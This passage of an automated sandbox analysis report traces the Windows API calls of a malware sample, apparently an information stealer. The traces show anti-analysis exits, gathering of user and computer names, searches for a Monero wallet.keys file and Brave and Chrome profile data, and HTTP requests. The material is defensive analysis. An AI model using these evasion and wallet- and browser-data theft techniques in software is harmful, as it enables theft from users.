                                • Part of subcall function 00931160: GetSystemInfo.KERNEL32(?), ref: 0093116A
                                • Part of subcall function 00931160: ExitProcess.KERNEL32 ref: 0093117E
                                • Part of subcall function 00931110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0093112B
                                • Part of subcall function 00931110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00931132
                                • Part of subcall function 00931110: ExitProcess.KERNEL32 ref: 00931143
                                • Part of subcall function 00931220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0093123E
                                • Part of subcall function 00931220: ExitProcess.KERNEL32 ref: 00931294
                                • Part of subcall function 00946770: GetUserDefaultLangID.KERNEL32 ref: 00946774
                                • Part of subcall function 00931190: ExitProcess.KERNEL32 ref: 009311C6
                                • Part of subcall function 00947850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                • Part of subcall function 00947850: RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                • Part of subcall function 00947850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                                • Part of subcall function 009478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                • Part of subcall function 009478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                • Part of subcall function 009478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010F8878,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00946AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00946AF9
                              • Sleep.KERNEL32(00001770), ref: 00946B04
                              • CloseHandle.KERNEL32(?,00000000,?,010F8878,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946B1A
                              • ExitProcess.KERNEL32 ref: 00946B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: aa9c960953a2906c09866bfe7cee711418b03b9c338cbd872e55e529d118a727
                              • Instruction ID: a8709b4448b0e10a5c9cb066cce7401b4fcb304d34767fe2e2c25624c2dc6cca
                              • Opcode Fuzzy Hash: aa9c960953a2906c09866bfe7cee711418b03b9c338cbd872e55e529d118a727
                              • Instruction Fuzzy Hash: 25311C71944208AAEB08FBF0DC56FEE7778EFC4345F104518F612A2192DF706A45CBA6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              [Control-flow graph (graph data, image residue): basic blocks 946aba-946b22; subcalls 94aad0, 946920, 945b10; APIs OpenEventA, CreateEventA, CloseHandle, Sleep, ExitProcess]
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010F8878,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00946AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00946AF9
                              • Sleep.KERNEL32(00001770), ref: 00946B04
                              • CloseHandle.KERNEL32(?,00000000,?,010F8878,?,0095110C,?,00000000,?,00951110,?,00000000,00950AEF), ref: 00946B1A
                              • ExitProcess.KERNEL32 ref: 00946B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 1532c628f6b47e76ead72ed7c22e5cb2c94b2175621561fc3c46e34841d00764
                              • Instruction ID: 02847ab1bc493557b1bb502969db6817ca87365872493851dbb5466d7143bdd8
                              • Opcode Fuzzy Hash: 1532c628f6b47e76ead72ed7c22e5cb2c94b2175621561fc3c46e34841d00764
                              • Instruction Fuzzy Hash: 41F08CB0A44219AFE740ABA0DC0AFBE7B78FB85701F104914F517E21C1CFB05980DAA7

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: a5ccee42a8156a60060367a773642a57d8ca289eff75d0d1a66333d85363c6ce
                              • Instruction ID: 7bfd19ad67aa5e5933e972e83da1d4c497f38f4a2901bd893c51b836af07b4f6
                              • Opcode Fuzzy Hash: a5ccee42a8156a60060367a773642a57d8ca289eff75d0d1a66333d85363c6ce
                              • Instruction Fuzzy Hash: 59213EB1D00209ABDF14DFA5EC45BDE7B75FB44320F108625F915A7291EB706A09CF91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • Part of subcall function 00936280: InternetOpenA.WININET(00950DFE,00000001,00000000,00000000,00000000), ref: 009362E1
                                • Part of subcall function 00936280: StrCmpCA.SHLWAPI(?,010FE238), ref: 00936303
                                • Part of subcall function 00936280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00936335
                                • Part of subcall function 00936280: HttpOpenRequestA.WININET(00000000,GET,?,010FD8B8,00000000,00000000,00400100,00000000), ref: 00936385
                                • Part of subcall function 00936280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009363BF
                                • Part of subcall function 00936280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009363D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00945228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 158de1e07cb6ea03cad2b46027c9f282fe92e97bf75e39f35b5b159bd390dad2
                              • Instruction ID: 59dfec1067963076c170827c5bec08f89c48f6de136ff51b5f27038e3c085a26
                              • Opcode Fuzzy Hash: 158de1e07cb6ea03cad2b46027c9f282fe92e97bf75e39f35b5b159bd390dad2
                              • Instruction Fuzzy Hash: 3311FE30954148ABEB14FFB4DD52FED7339AF90304F404558F81A5B592EF74AB05CA92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              [Control-flow graph (graph data, image residue): basic blocks 931220-93129d; subcalls 9489b0, 94da00; APIs GlobalMemoryStatusEx, ExitProcess]
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0093123E
                              • ExitProcess.KERNEL32 ref: 00931294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 006c31c0806b407e58cc3c0c03d13fefa5c5e5ce6bc0ecac1ec971c440aa38a3
                              • Instruction ID: 463eba9c32cc48e7169ca00852a71cca200f6cb717b0b7fc970ebd5685d215a5
                              • Opcode Fuzzy Hash: 006c31c0806b407e58cc3c0c03d13fefa5c5e5ce6bc0ecac1ec971c440aa38a3
                              • Instruction Fuzzy Hash: AF011DB0D44308BBEB10EFE4CC49F9EBB78AB54705F208049E709B62D0DB7459458B99
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0093112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00931132
                              • ExitProcess.KERNEL32 ref: 00931143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 34e946083210e9df89ed3b1bb46a86bc95f3b582d032e72a7ea2846725ed6d78
                              • Instruction ID: bead969e56557794c731b591a9bb60568cd525602bc9698c328cb8202172a78c
                              • Opcode Fuzzy Hash: 34e946083210e9df89ed3b1bb46a86bc95f3b582d032e72a7ea2846725ed6d78
                              • Instruction Fuzzy Hash: 2CE0E670949308FBE7546BA09D0AB4D7678AB44B02F104154F70D771D0DAB52A419A9A
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009310B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009310F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: d98249c0730f421d4d8e8ee99cd73ef2316d4c38a2b70852142818488efcdf67
                              • Instruction ID: 5dca9fdf59d64c67696f6ee4f5887d58a550bb4bba7be8d3dc71b27ab5701e44
                              • Opcode Fuzzy Hash: d98249c0730f421d4d8e8ee99cd73ef2316d4c38a2b70852142818488efcdf67
                              • Instruction Fuzzy Hash: B4F0E2B1641208BBE7189AA4AC59FAFB7ECE705B15F300848F504E7290D9719F40CAA1
                              APIs
                                • Part of subcall function 009478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                • Part of subcall function 009478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                • Part of subcall function 009478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                • Part of subcall function 00947850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                • Part of subcall function 00947850: RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                • Part of subcall function 00947850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                              • ExitProcess.KERNEL32 ref: 009311C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 4cd4e0298d0f21da547df46c6c50453ef4ccbe4db34a546a93f74665172614fe
                              • Instruction ID: 5b2c2f9dee3526044eebb7e959109a0423212101a18a083f4f896e0a902c79ef
                              • Opcode Fuzzy Hash: 4cd4e0298d0f21da547df46c6c50453ef4ccbe4db34a546a93f74665172614fe
                              • Instruction Fuzzy Hash: 1AE017B991830553CA4477F0AC8BF2F369C5B9474AF040828FA09D3212FE65E8408A6A
                              APIs
                              • wsprintfA.USER32 ref: 009438CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 009438E3
                              • lstrcat.KERNEL32(?,?), ref: 00943935
                              • StrCmpCA.SHLWAPI(?,00950F70), ref: 00943947
                              • StrCmpCA.SHLWAPI(?,00950F74), ref: 0094395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00943C67
                              • FindClose.KERNEL32(000000FF), ref: 00943C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 02bcd65a5f1e0c680528734457446c5d4956f9a4ac4b4583b68d951cd1b810b3
                              • Instruction ID: 8af562d82ad61dd9c9b84dbf0f8a5beef6f18036d4d1898a9a8019a70e488474
                              • Opcode Fuzzy Hash: 02bcd65a5f1e0c680528734457446c5d4956f9a4ac4b4583b68d951cd1b810b3
                              • Instruction Fuzzy Hash: F3A111B1A00218ABDB64EFA4DC85FEE7379BB84301F048588B95D97141EB759B84CF62
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                              • FindFirstFileA.KERNEL32(00000000,?,00950B32,00950B2B,00000000,?,?,?,009513F4,00950B2A), ref: 0093BEF5
                              • StrCmpCA.SHLWAPI(?,009513F8), ref: 0093BF4D
                              • StrCmpCA.SHLWAPI(?,009513FC), ref: 0093BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0093C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0093C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 0f160bab538ecaa2c00a4f98f01ba06e22a732ec817186f1ea7eb5371c7c64de
                              • Instruction ID: ff7bda6e7b9fe4b4c13dcbe5a24ab4b5d624dd29f82e1fd4c0260ad778ba0333
                              • Opcode Fuzzy Hash: 0f160bab538ecaa2c00a4f98f01ba06e22a732ec817186f1ea7eb5371c7c64de
                              • Instruction Fuzzy Hash: E6425072950104ABEB14FB70DD96FEE737DABC4304F404558B90AA7191EE34AB49CFA2
                              APIs
                              • wsprintfA.USER32 ref: 0094492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00944943
                              • StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                              • StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                              • FindClose.KERNEL32(000000FF), ref: 00944B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: a4c387807c76d52df75dea81b66a5c29209904cfb8306872a48c394fafe4f888
                              • Instruction ID: b75513e1704713cf8d4b8524e603094fd6c09e860b089f476d4f7866636f0df6
                              • Opcode Fuzzy Hash: a4c387807c76d52df75dea81b66a5c29209904cfb8306872a48c394fafe4f888
                              • Instruction Fuzzy Hash: 546101B2900218ABCB64EBA0DC45FEE737CBBC8705F044598B50D96151EE75EB89CF92
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00944580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00944587
                              • wsprintfA.USER32 ref: 009445A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 009445BD
                              • StrCmpCA.SHLWAPI(?,00950FC4), ref: 009445EB
                              • StrCmpCA.SHLWAPI(?,00950FC8), ref: 00944601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0094468B
                              • FindClose.KERNEL32(000000FF), ref: 009446A0
                              • lstrcat.KERNEL32(?,010FE278), ref: 009446C5
                              • lstrcat.KERNEL32(?,010FD1E0), ref: 009446D8
                              • lstrlen.KERNEL32(?), ref: 009446E5
                              • lstrlen.KERNEL32(?), ref: 009446F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 73ae00ac9c3e10ca3dca3dd7253a1f105c5d07f83c508792ee3acb2983c9c3c2
                              • Instruction ID: a3ea04865d1a8775717acebcbb0d755b82b693f5a6bae8c627101b890dd8dbfb
                              • Opcode Fuzzy Hash: 73ae00ac9c3e10ca3dca3dd7253a1f105c5d07f83c508792ee3acb2983c9c3c2
                              • Instruction Fuzzy Hash: 855134B2550218ABC764EB70DC89FED737CAB98701F404588F60D97190EF749B858F92
                              APIs
                              • wsprintfA.USER32 ref: 00943EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00943EDA
                              • StrCmpCA.SHLWAPI(?,00950FAC), ref: 00943F08
                              • StrCmpCA.SHLWAPI(?,00950FB0), ref: 00943F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0094406C
                              • FindClose.KERNEL32(000000FF), ref: 00944081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 4b700a1b8b46c7096537457b079891bac20fb44399735ba83e6f57120f5acb8f
                              • Instruction ID: 716d7f364e542b293e518b088a042c520d22bde7c2704b40cc3adc2a37f0f6a0
